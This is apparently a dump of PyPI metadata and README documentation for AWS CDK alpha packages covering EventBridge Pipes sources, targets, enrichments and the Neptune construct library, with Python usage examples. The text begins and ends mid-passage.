target=log_group_target ) ``` The input to the target log group can be transformed: ```python # source_queue: sqs.Queue # target_log_group: logs.LogGroup log_group_target = targets.CloudWatchLogsTarget(target_log_group, input_transformation=pipes.InputTransformation.from_object({"body": "👀"}) ) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=log_group_target ) ``` ### Amazon EventBridge Event Bus An EventBridge event bus can be used as a target for a pipe. The event bus will receive the (enriched/filtered) source payload. ```python # source_queue: sqs.Queue # target_event_bus: events.EventBus event_bus_target = targets.EventBridgeTarget(target_event_bus) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=event_bus_target ) ``` The input to the target event bus can be transformed: ```python # source_queue: sqs.Queue # target_event_bus: events.EventBus event_bus_target = targets.EventBridgeTarget(target_event_bus, input_transformation=pipes.InputTransformation.from_object({"body": "👀"}) ) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=event_bus_target ) ``` ### Amazon Data Firehose Delivery Stream An Amazon Data Firehose delivery stream can be used as a target for a pipe. The delivery stream will receive the (enriched/filtered) source payload. ```python # source_queue: sqs.Queue # target_delivery_stream: firehose.DeliveryStream delivery_stream_target = targets.FirehoseTarget(target_delivery_stream) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=delivery_stream_target ) ``` The input to the target delivery stream can be transformed: ```python # source_queue: sqs.Queue # target_delivery_stream: firehose.DeliveryStream delivery_stream_target = targets.FirehoseTarget(target_delivery_stream, input_transformation=pipes.InputTransformation.from_object({"body": "👀"}) ) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=delivery_stream_target ) ``` ### Amazon Kinesis Data Stream A Kinesis data stream can be used as a target for a pipe. The data stream will receive the (enriched/filtered) source payload. ```python # source_queue: sqs.Queue # target_stream: kinesis.Stream stream_target = targets.KinesisTarget(target_stream, partition_key="pk" ) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=stream_target ) ``` The input to the target data stream can be transformed: ```python # source_queue: sqs.Queue # target_stream: kinesis.Stream stream_target = targets.KinesisTarget(target_stream, partition_key="pk", input_transformation=pipes.InputTransformation.from_object({"body": "👀"}) ) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=stream_target ) ``` ### AWS Lambda Function A Lambda function can be used as a target for a pipe. The Lambda function will be invoked with the (enriched/filtered) source payload. ```python # source_queue: sqs.Queue # target_function: lambda.IFunction pipe_target = targets.LambdaFunction(target_function) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=pipe_target ) ``` The target Lambda function is invoked synchronously by default. You can also choose to invoke the Lambda Function asynchronously by setting `invocationType` property to `FIRE_AND_FORGET`. ```python # source_queue: sqs.Queue # target_function: lambda.IFunction pipe_target = targets.LambdaFunction(target_function, invocation_type=targets.LambdaFunctionInvocationType.FIRE_AND_FORGET ) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=pipe_target ) ``` The input to the target Lambda Function can be transformed: ```python # source_queue: sqs.Queue # target_function: lambda.IFunction pipe_target = targets.LambdaFunction(target_function, input_transformation=pipes.InputTransformation.from_object({"body": "👀"}) ) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=pipe_target ) ``` ### Amazon SageMaker Pipeline A SageMaker pipeline can be used as a target for a pipe. The pipeline will receive the (enriched/filtered) source payload. ```python # source_queue: sqs.Queue # target_pipeline: sagemaker.IPipeline pipeline_target = targets.SageMakerTarget(target_pipeline) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=pipeline_target ) ``` The input to the target pipeline can be transformed: ```python # source_queue: sqs.Queue # target_pipeline: sagemaker.IPipeline pipeline_target = targets.SageMakerTarget(target_pipeline, input_transformation=pipes.InputTransformation.from_object({"body": "👀"}) ) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=pipeline_target ) ``` ### AWS Step Functions State Machine A Step Functions state machine can be used as a target for a pipe. The state machine will be invoked with the (enriched/filtered) source payload. ```python # source_queue: sqs.Queue # target_state_machine: sfn.IStateMachine pipe_target = targets.SfnStateMachine(target_state_machine) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=pipe_target ) ``` You can specify the invocation type when the target state machine is invoked: ```python # source_queue: sqs.Queue # target_state_machine: sfn.IStateMachine pipe_target = targets.SfnStateMachine(target_state_machine, invocation_type=targets.StateMachineInvocationType.FIRE_AND_FORGET ) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=pipe_target ) ``` The input to the target state machine can be transformed: ```python # source_queue: sqs.Queue # target_state_machine: sfn.IStateMachine pipe_target = targets.SfnStateMachine(target_state_machine, input_transformation=pipes.InputTransformation.from_object({"body": "<$.body>"}), invocation_type=targets.StateMachineInvocationType.FIRE_AND_FORGET ) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=pipe_target ) ``` ### Amazon SNS Topic An SNS topic can be used as a target for a pipe. The topic will receive the (enriched/filtered) source payload. ```python # source_queue: sqs.Queue # target_topic: sns.Topic pipe_target = targets.SnsTarget(target_topic) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=pipe_target ) ``` The target input can be transformed: ```python # source_queue: sqs.Queue # target_topic: sns.Topic pipe_target = targets.SnsTarget(target_topic, input_transformation=pipes.InputTransformation.from_object({ "SomeKey": pipes.DynamicInput.from_event_path("$.body") }) ) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=pipe_target ) ``` ### Amazon SQS Queue An SQS queue can be used as a target for a pipe. The queue will receive the (enriched/filtered) source payload. ```python # source_queue: sqs.Queue # target_queue: sqs.Queue pipe_target = targets.SqsTarget(target_queue) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=pipe_target ) ``` The target input can be transformed: ```python # source_queue: sqs.Queue # target_queue: sqs.Queue pipe_target = targets.SqsTarget(target_queue, input_transformation=pipes.InputTransformation.from_object({ "SomeKey": pipes.DynamicInput.from_event_path("$.body") }) ) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=pipe_target ) ```
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.239.0", "aws-cdk.aws-pipes-alpha==2.239.0.a0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:16.062005
aws_cdk_aws_pipes_targets_alpha-2.239.0a0.tar.gz
90,594
b7/a6/4b9dc939ba18860216bdd350c2423b9ccdb0c06a08bf8ca39a67ba518bcd/aws_cdk_aws_pipes_targets_alpha-2.239.0a0.tar.gz
source
sdist
null
false
8e3d6b3af89ea94045d4edf3f1d79ae1
d5d6c5b443d04bce745ffbec22548731582596cc97b55668782a7e4897e0ae56
b7a64b9dc939ba18860216bdd350c2423b9ccdb0c06a08bf8ca39a67ba518bcd
null
[]
0
2.1
aws-cdk.aws-pipes-sources-alpha
2.239.0a0
The CDK Construct Library for Amazon EventBridge Pipes Sources
# Amazon EventBridge Pipes Sources Construct Library <!--BEGIN STABILITY BANNER-->--- ![cdk-constructs: Experimental](https://img.shields.io/badge/cdk--constructs-experimental-important.svg?style=for-the-badge) > The APIs of higher level constructs in this module are experimental and under active development. > They are subject to non-backward compatible changes or removal in any future version. These are > not subject to the [Semantic Versioning](https://semver.org/) model and breaking changes will be > announced in the release notes. This means that while you may use them, you may need to update > your source code when upgrading to a newer version of this package. --- <!--END STABILITY BANNER--> EventBridge Pipes Sources let you create a source for a EventBridge Pipe. For more details see the service documentation: [Documentation](https://docs.aws.amazon.com/eventbridge/latest/userguide/eb-pipes-event-source.html) ## Pipe sources Pipe sources are the starting point of a EventBridge Pipe. They are the source of the events that are sent to the pipe. ### Amazon SQS A SQS message queue can be used as a source for a pipe. The queue will be polled for new messages and the messages will be sent to the pipe. ```python # source_queue: sqs.Queue # target_queue: sqs.Queue pipe_source = sources.SqsSource(source_queue) pipe = pipes.Pipe(self, "Pipe", source=pipe_source, target=SqsTarget(target_queue) ) ``` The polling configuration can be customized: ```python # source_queue: sqs.Queue # target_queue: sqs.Queue pipe_source = sources.SqsSource(source_queue, batch_size=10, maximum_batching_window=cdk.Duration.seconds(10) ) pipe = pipes.Pipe(self, "Pipe", source=pipe_source, target=SqsTarget(target_queue) ) ``` ### Amazon Kinesis A Kinesis stream can be used as a source for a pipe. The stream will be polled for new messages and the messages will be sent to the pipe. ```python # source_stream: kinesis.Stream # target_queue: sqs.Queue pipe_source = sources.KinesisSource(source_stream, starting_position=sources.KinesisStartingPosition.LATEST ) pipe = pipes.Pipe(self, "Pipe", source=pipe_source, target=SqsTarget(target_queue) ) ``` ### Amazon DynamoDB A DynamoDB stream can be used as a source for a pipe. The stream will be polled for new messages and the messages will be sent to the pipe. ```python # target_queue: sqs.Queue table = ddb.TableV2(self, "MyTable", partition_key=ddb.Attribute( name="id", type=ddb.AttributeType.STRING ), dynamo_stream=ddb.StreamViewType.NEW_IMAGE ) pipe_source = sources.DynamoDBSource(table, starting_position=sources.DynamoDBStartingPosition.LATEST ) pipe = pipes.Pipe(self, "Pipe", source=pipe_source, target=SqsTarget(target_queue) ) ```
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.239.0", "aws-cdk.aws-pipes-alpha==2.239.0.a0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:15.319879
aws_cdk_aws_pipes_sources_alpha-2.239.0a0.tar.gz
65,281
09/2b/fab9004d1ebf733223ec9c4bd2fbcfd0c77c9d0cb9c09e7a5da4ce9a7755/aws_cdk_aws_pipes_sources_alpha-2.239.0a0.tar.gz
source
sdist
null
false
52e009f32492279aa3bfea2dae2046ec
96bb31d3f6ecb0d1e927b238e16ebba06e0c87350006ba1e69f09ed7bd82e6e3
092bfab9004d1ebf733223ec9c4bd2fbcfd0c77c9d0cb9c09e7a5da4ce9a7755
null
[]
0
2.1
aws-cdk.aws-pipes-enrichments-alpha
2.239.0a0
The CDK Construct Library for Amazon EventBridge Pipes Enrichments
# Amazon EventBridge Pipes Enrichments Construct Library <!--BEGIN STABILITY BANNER-->--- ![cdk-constructs: Experimental](https://img.shields.io/badge/cdk--constructs-experimental-important.svg?style=for-the-badge) > The APIs of higher level constructs in this module are experimental and under active development. > They are subject to non-backward compatible changes or removal in any future version. These are > not subject to the [Semantic Versioning](https://semver.org/) model and breaking changes will be > announced in the release notes. This means that while you may use them, you may need to update > your source code when upgrading to a newer version of this package. --- <!--END STABILITY BANNER--> EventBridge Pipes Enrichments let you create enrichments for an EventBridge Pipe. For more details see the service documentation: [Documentation](https://docs.aws.amazon.com/eventbridge/latest/userguide/pipes-enrichment.html) ## Pipe sources Pipe enrichments are invoked prior to sending the events to a target of a EventBridge Pipe. ### Lambda function A Lambda function can be used to enrich events of a pipe. ```python # source_queue: sqs.Queue # target_queue: sqs.Queue # enrichment_function: lambda.Function enrichment = enrichments.LambdaEnrichment(enrichment_function) pipe = pipes.Pipe(self, "Pipe", source=SomeSource(source_queue), enrichment=enrichment, target=SomeTarget(target_queue) ) ``` ### Step Functions state machine Step Functions state machine can be used to enrich events of a pipe. **Note:** EventBridge Pipes only supports Express workflows invoked synchronously. > Visit [Amazon EventBridge Pipes event enrichment](https://docs.aws.amazon.com/eventbridge/latest/userguide/pipes-enrichment.html) for more details. ```python # source_queue: sqs.Queue # target_queue: sqs.Queue # enrichment_state_machine: stepfunctions.StateMachine enrichment = enrichments.StepFunctionsEnrichment(enrichment_state_machine) pipe = pipes.Pipe(self, "Pipe", source=SomeSource(source_queue), enrichment=enrichment, target=SomeTarget(target_queue) ) ``` ### API destination API destination can be used to enrich events of a pipe. ```python # source_queue: sqs.Queue # target_queue: sqs.Queue # api_destination: events.ApiDestination enrichment = enrichments.ApiDestinationEnrichment(api_destination) pipe = pipes.Pipe(self, "Pipe", source=SomeSource(source_queue), enrichment=enrichment, target=SomeTarget(target_queue) ) ``` ### API Gateway (REST API) API Gateway can be used to enrich events of a pipe. Pipes only supports API Gateway REST APIs. HTTP APIs are not supported. ```python # source_queue: sqs.Queue # target_queue: sqs.Queue # rest_api: apigateway.RestApi enrichment = enrichments.ApiGatewayEnrichment(rest_api) pipe = pipes.Pipe(self, "Pipe", source=SomeSource(source_queue), enrichment=enrichment, target=SomeTarget(target_queue) ) ```
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.239.0", "aws-cdk.aws-pipes-alpha==2.239.0.a0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:14.580526
aws_cdk_aws_pipes_enrichments_alpha-2.239.0a0.tar.gz
55,756
a8/0f/10634c5eff46e9bca3bc14623b2a059ff2afb63b02eaf7965b162d972f9d/aws_cdk_aws_pipes_enrichments_alpha-2.239.0a0.tar.gz
source
sdist
null
false
c6c81e517f25787c2b47fe3c1afda348
c94050daca0dee02214851b97f46ee281687c4738631f03bfc8f4fdda14d9d3b
a80f10634c5eff46e9bca3bc14623b2a059ff2afb63b02eaf7965b162d972f9d
null
[]
0
2.1
aws-cdk.aws-pipes-alpha
2.239.0a0
The CDK Construct Library for Amazon EventBridge Pipes
# Amazon EventBridge Pipes Construct Library <!--BEGIN STABILITY BANNER-->--- ![cdk-constructs: Experimental](https://img.shields.io/badge/cdk--constructs-experimental-important.svg?style=for-the-badge) > The APIs of higher level constructs in this module are experimental and under active development. > They are subject to non-backward compatible changes or removal in any future version. These are > not subject to the [Semantic Versioning](https://semver.org/) model and breaking changes will be > announced in the release notes. This means that while you may use them, you may need to update > your source code when upgrading to a newer version of this package. --- <!--END STABILITY BANNER--> EventBridge Pipes let you create source to target connections between several AWS services. While transporting messages from a source to a target the messages can be filtered, transformed and enriched. ![diagram of pipes](https://d1.awsstatic.com/product-marketing/EventBridge/Product-Page-Diagram_Amazon-EventBridge-Pipes.cd7961854be4432d63f6158ffd18271d6c9fa3ec.png) For more details see the [service documentation](https://docs.aws.amazon.com/eventbridge/latest/userguide/eb-pipes.html). ## Pipe [EventBridge Pipes](https://aws.amazon.com/blogs/aws/new-create-point-to-point-integrations-between-event-producers-and-consumers-with-amazon-eventbridge-pipes/) is a fully managed service that enables point-to-point integrations between event producers and consumers. Pipes can be used to connect several AWS services to each other, or to connect AWS services to external services. A pipe has a source and a target. The source events can be filtered and enriched before reaching the target. ## Example - pipe usage > The following code examples use an example implementation of a [source](#source) and [target](#target). To define a pipe you need to create a new `Pipe` construct. The `Pipe` construct needs a source and a target. ```python # source_queue: sqs.Queue # target_queue: sqs.Queue pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=SqsTarget(target_queue) ) ``` This minimal example creates a pipe with a SQS queue as source and a SQS queue as target. Messages from the source are put into the body of the target message. ## Source A source is a AWS Service that is polled. The following sources are possible: * [Amazon DynamoDB stream](https://docs.aws.amazon.com/eventbridge/latest/userguide/eb-pipes-dynamodb.html) * [Amazon Kinesis stream](https://docs.aws.amazon.com/eventbridge/latest/userguide/eb-pipes-kinesis.html) * [Amazon MQ broker](https://docs.aws.amazon.com/eventbridge/latest/userguide/eb-pipes-mq.html) * [Amazon MSK stream](https://docs.aws.amazon.com/eventbridge/latest/userguide/eb-pipes-msk.html) * [Amazon SQS queue](https://docs.aws.amazon.com/eventbridge/latest/userguide/eb-pipes-sqs.html) * [Apache Kafka stream](https://docs.aws.amazon.com/eventbridge/latest/userguide/eb-pipes-kafka.html) Currently, DynamoDB, Kinesis, and SQS are supported. If you are interested in support for additional sources, kindly let us know by opening a GitHub issue or raising a PR. ### Example source ```python # source_queue: sqs.Queue pipe_source = SqsSource(source_queue) ``` ## Filter A filter can be used to filter the events from the source before they are forwarded to the enrichment or, if no enrichment is present, target step. Multiple filter expressions are possible. If one of the filter expressions matches, the event is forwarded to the enrichment or target step. ### Example - filter usage ```python # source_queue: sqs.Queue # target_queue: sqs.Queue source_filter = pipes.Filter([ pipes.FilterPattern.from_object({ "body": { # only forward events with customerType B2B or B2C "customer_type": ["B2B", "B2C"] } }) ]) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=SqsTarget(target_queue), filter=source_filter ) ``` This example shows a filter that only forwards events with the `customerType` B2B or B2C from the source messages. Messages that are not matching the filter are not forwarded to the enrichment or target step. You can define multiple filter pattern which are combined with a logical `OR`. Additional filter pattern and details can be found in the EventBridge pipes [docs](https://docs.aws.amazon.com/eventbridge/latest/userguide/eb-pipes-event-filtering.html). ## Input transformation For enrichments and targets the input event can be transformed. The transformation is applied for each item of the batch. A transformation has access to the input event as well to some context information of the pipe itself like the name of the pipe. See [docs](https://docs.aws.amazon.com/eventbridge/latest/userguide/eb-pipes-input-transformation.html) for details. ### Example - input transformation from object The input transformation can be created from an object. The object can contain static values, dynamic values or pipe variables. ```python # source_queue: sqs.Queue # target_queue: sqs.Queue target_input_transformation = pipes.InputTransformation.from_object({ "static_field": "static value", "dynamic_field": pipes.DynamicInput.from_event_path("$.body.payload"), "pipe_variable": pipes.DynamicInput.pipe_name }) pipe = pipes.Pipe(self, "Pipe", pipe_name="MyPipe", source=SqsSource(source_queue), target=SqsTarget(target_queue, input_transformation=target_input_transformation ) ) ``` This example shows a transformation that adds a static field, a dynamic field and a pipe variable to the input event. The dynamic field is extracted from the input event. The pipe variable is extracted from the pipe context. So when the following batch of input events is processed by the pipe ```json [ { ... "body": "{\"payload\": \"Test message.\"}", ... } ] ``` it is converted into the following payload: ```json [ { ... "staticField": "static value", "dynamicField": "Test message.", "pipeVariable": "MyPipe", ... } ] ``` If the transformation is applied to a target it might be converted to a string representation. For example, the resulting SQS message body looks like this: ```json [ { ... "body": "{\"staticField\": \"static value\", \"dynamicField\": \"Test message.\", \"pipeVariable\": \"MyPipe\"}", ... } ] ``` ### Example - input transformation from event path In cases where you want to forward only a part of the event to the target you can use the transformation event path. > This only works for targets because the enrichment needs to have a valid json as input. ```python # source_queue: sqs.Queue # target_queue: sqs.Queue target_input_transformation = pipes.InputTransformation.from_event_path("$.body.payload") pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=SqsTarget(target_queue, input_transformation=target_input_transformation ) ) ``` This transformation extracts the body of the event. So when the following batch of input events is processed by the pipe ```json [ { ... "body": "\"{\"payload\": \"Test message.\"}\"", ... } ] ``` it is converted into the following target payload: ```json [ { ... "body": "Test message." ... } ] ``` > The [implicit payload parsing](https://docs.aws.amazon.com/eventbridge/latest/userguide/eb-pipes-input-transformation.html#input-transform-implicit) (e.g. SQS message body to JSON) only works if the input is the source payload. Implicit body parsing is not applied on enrichment results. ### Example - input transformation from text In cases where you want to forward a static text to the target or use your own formatted `inputTemplate` you can use the transformation from text. ```python # source_queue: sqs.Queue # target_queue: sqs.Queue target_input_transformation = pipes.InputTransformation.from_text("My static text") pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=SqsTarget(target_queue, input_transformation=target_input_transformation ) ) ``` This transformation forwards the static text to the target. ```json [ { ... "body": "My static text" ... } ] ``` ## Enrichment In the enrichment step the (un)filtered payloads from the source can be used to invoke one of the following services: * API destination * Amazon API Gateway * Lambda function * Step Functions state machine * only express workflow ### Example enrichment implementation > Currently no implementation exist for any of the supported enrichments. The following example shows how an implementation can look like. The actual implementation is not part of this package and will be in a separate one. ```python @jsii.implements(pipes.IEnrichment) class LambdaEnrichment: def __init__(self, lambda_, props=None): self.enrichment_arn = lambda_.function_arn self.input_transformation = props.input_transformation def bind(self, pipe): return pipes.EnrichmentParametersConfig( enrichment_parameters=cdk.aws_pipes.CfnPipe.PipeEnrichmentParametersProperty( input_template=self.input_transformation.bind(pipe).input_template ) ) def grant_invoke(self, pipe_role): self.lambda_.grant_invoke(pipe_role) ``` An enrichment implementation needs to provide the `enrichmentArn`, `enrichmentParameters` and grant the pipe role invoke access to the enrichment. ### Example - enrichment usage ```python # source_queue: sqs.Queue # target_queue: sqs.Queue # enrichment_lambda: lambda.Function enrichment_input_transformation = pipes.InputTransformation.from_object({ "static_field": "static value", "dynamic_field": pipes.DynamicInput.from_event_path("$.body.payload"), "pipe_variable": pipes.DynamicInput.pipe_name }) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=SqsTarget(target_queue), enrichment=LambdaEnrichment(enrichment_lambda, { "input_transformation": enrichment_input_transformation }) ) ``` This example adds a lambda function as enrichment to the pipe. The lambda function is invoked with the batch of messages from the source after applying the transformation. The lambda function can return a result which is forwarded to the target. So the following batch of input events is processed by the pipe ```json [ { ... "body": "{\"payload\": \"Test message.\"}", ... } ] ``` it is converted into the following payload which is sent to the lambda function. ```json [ { ... "staticField": "static value", "dynamicField": "Test message.", "pipeVariable": "MyPipe", ... } ] ``` The lambda function can return a result which is forwarded to the target. For example a lambda function that returns a concatenation of the static field, dynamic field and pipe variable ```python def handler(event): return event.static_field + "-" + event.dynamic_field + "-" + event.pipe_variable ``` will produce the following target message in the target SQS queue. ```json [ { ... "body": "static value-Test message.-MyPipe", ... } ] ``` ## Target A Target is the end of the Pipe. After the payload from the source is pulled, filtered and enriched it is forwarded to the target. For now the following targets are supported: * [API destination](https://docs.aws.amazon.com/eventbridge/latest/userguide/eb-api-destinations.html) * [API Gateway](https://docs.aws.amazon.com/eventbridge/latest/userguide/eb-api-gateway-target.html) * [Batch job queue](https://docs.aws.amazon.com/eventbridge/latest/userguide/eb-pipes-event-target.html#pipes-targets-specifics-batch) * [CloudWatch log group](https://docs.aws.amazon.com/eventbridge/latest/userguide/eb-pipes-event-target.html#pipes-targets-specifics-cwl) * [ECS task](https://docs.aws.amazon.com/eventbridge/latest/userguide/eb-pipes-event-target.html#pipes-targets-specifics-ecs-task) * Event bus in the same account and Region * Firehose delivery stream * Inspector assessment template * Kinesis stream * Lambda function (SYNC or ASYNC) * Redshift cluster data API queries * SageMaker Pipeline * SNS topic * SQS queue * Step Functions state machine * Express workflows (ASYNC) * Standard workflows (SYNC or ASYNC) The target event can be transformed before it is forwarded to the target using the same input transformation as in the enrichment step. ### Example target ```python # target_queue: sqs.Queue pipe_target = SqsTarget(target_queue) ``` ## Log destination A pipe can produce log events that are forwarded to different log destinations. You can configure multiple destinations, but all the destination share the same log level and log data. For details check the official [documentation](https://docs.aws.amazon.com/eventbridge/latest/userguide/eb-pipes-logs.html). The log level and data that is included in the log events is configured on the pipe class itself. The actual destination is defined independently, and there are three options: 1. `CloudwatchLogsLogDestination` 2. `FirehoseLogDestination` 3. `S3LogDestination` ### Example log destination usage ```python # source_queue: sqs.Queue # target_queue: sqs.Queue # log_group: logs.LogGroup cwl_log_destination = pipes.CloudwatchLogsLogDestination(log_group) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=SqsTarget(target_queue), log_level=pipes.LogLevel.TRACE, log_include_execution_data=[pipes.IncludeExecutionData.ALL], log_destinations=[cwl_log_destination] ) ``` This example uses a CloudWatch Logs log group to store the log emitted during a pipe execution. The log level is set to `TRACE` so all steps of the pipe are logged. Additionally all execution data is logged as well. ## Encrypt pipe data with KMS You can specify that EventBridge use a customer managed key to encrypt pipe data stored at rest, rather than use an AWS owned key as is the default. Details can be found in the [documentation](https://docs.aws.amazon.com/eventbridge/latest/userguide/eb-encryption-pipes-cmkey.html). To do this, you need to specify the key in the `kmsKey` property of the pipe. ```python # source_queue: sqs.Queue # target_queue: sqs.Queue # kms_key: kms.Key pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=SqsTarget(target_queue), kms_key=kms_key, # pipeName is required when using a KMS key pipe_name="MyPipe" ) ```
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.239.0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:13.750676
aws_cdk_aws_pipes_alpha-2.239.0a0.tar.gz
137,572
6e/88/295273d1ddb9fdba2967e8352ecc3e1b102ac69cd2d532c5e6dcf253eb3b/aws_cdk_aws_pipes_alpha-2.239.0a0.tar.gz
source
sdist
null
false
ae2e73016129313292aef682ad9313bf
6b4130f01df7d36d633e19aa7fa1222e64febce049710c455c25a131f129e5af
6e88295273d1ddb9fdba2967e8352ecc3e1b102ac69cd2d532c5e6dcf253eb3b
null
[]
0
2.1
aws-cdk.aws-neptune-alpha
2.239.0a0
The CDK Construct Library for AWS::Neptune
# Amazon Neptune Construct Library <!--BEGIN STABILITY BANNER-->--- ![cdk-constructs: Experimental](https://img.shields.io/badge/cdk--constructs-experimental-important.svg?style=for-the-badge) > The APIs of higher level constructs in this module are experimental and under active development. > They are subject to non-backward compatible changes or removal in any future version. These are > not subject to the [Semantic Versioning](https://semver.org/) model and breaking changes will be > announced in the release notes. This means that while you may use them, you may need to update > your source code when upgrading to a newer version of this package. --- <!--END STABILITY BANNER--> Amazon Neptune is a fast, reliable, fully managed graph database service that makes it easy to build and run applications that work with highly connected datasets. The core of Neptune is a purpose-built, high-performance graph database engine. This engine is optimized for storing billions of relationships and querying the graph with milliseconds latency. Neptune supports the popular graph query languages Apache TinkerPop Gremlin and W3C’s SPARQL, enabling you to build queries that efficiently navigate highly connected datasets. The `@aws-cdk/aws-neptune-alpha` package contains primitives for setting up Neptune database clusters and instances. ```python import aws_cdk.aws_neptune_alpha as neptune ``` ## Starting a Neptune Database To set up a Neptune database, define a `DatabaseCluster`. You must always launch a database in a VPC. ```python cluster = neptune.DatabaseCluster(self, "Database", vpc=vpc, instance_type=neptune.InstanceType.R5_LARGE ) ``` By default only writer instance is provisioned with this construct. ## Connecting To control who can access the cluster, use the `.connections` attribute. Neptune databases have a default port, so you don't need to specify the port: ```python cluster.connections.allow_default_port_from_any_ipv4("Open to the world") ``` The endpoints to access your database cluster will be available as the `.clusterEndpoint` and `.clusterReadEndpoint` attributes: ```python write_address = cluster.cluster_endpoint.socket_address ``` ## IAM Authentication You can also authenticate to a database cluster using AWS Identity and Access Management (IAM) database authentication; See [https://docs.aws.amazon.com/neptune/latest/userguide/iam-auth.html](https://docs.aws.amazon.com/neptune/latest/userguide/iam-auth.html) for more information and a list of supported versions and limitations. The following example shows enabling IAM authentication for a database cluster and granting connection access to an IAM role. ```python cluster = neptune.DatabaseCluster(self, "Cluster", vpc=vpc, instance_type=neptune.InstanceType.R5_LARGE, iam_authentication=True ) role = iam.Role(self, "DBRole", assumed_by=iam.AccountPrincipal(self.account)) # Use one of the following statements to grant the role the necessary permissions cluster.grant_connect(role) # Grant the role neptune-db:* access to the DB cluster.grant(role, "neptune-db:ReadDataViaQuery", "neptune-db:WriteDataViaQuery") ``` ## Customizing parameters Neptune allows configuring database behavior by supplying custom parameter groups. For more details, refer to the following link: [https://docs.aws.amazon.com/neptune/latest/userguide/parameters.html](https://docs.aws.amazon.com/neptune/latest/userguide/parameters.html) ```python cluster_params = neptune.ClusterParameterGroup(self, "ClusterParams", description="Cluster parameter group", parameters={ "neptune_enable_audit_log": "1" } ) db_params = neptune.ParameterGroup(self, "DbParams", description="Db parameter group", parameters={ "neptune_query_timeout": "120000" } ) cluster = neptune.DatabaseCluster(self, "Database", vpc=vpc, instance_type=neptune.InstanceType.R5_LARGE, cluster_parameter_group=cluster_params, parameter_group=db_params ) ``` Note: To use the Neptune engine versions `1.2.0.0` or later, including the newly added `1.4` series, it's necessary to specify the appropriate `engineVersion` prop in `neptune.DatabaseCluster`. Additionally, for both 1.2, 1.3 and 1.4 series, the corresponding `family` prop must be set to `ParameterGroupFamily.NEPTUNE_1_2`, `ParameterGroupFamily.NEPTUNE_1_3` or `ParameterGroupFamily.NEPTUNE_1_4` respectively in `neptune.ClusterParameterGroup` and `neptune.ParameterGroup`. ## Adding replicas `DatabaseCluster` allows launching replicas along with the writer instance. This can be specified using the `instanceCount` attribute. ```python cluster = 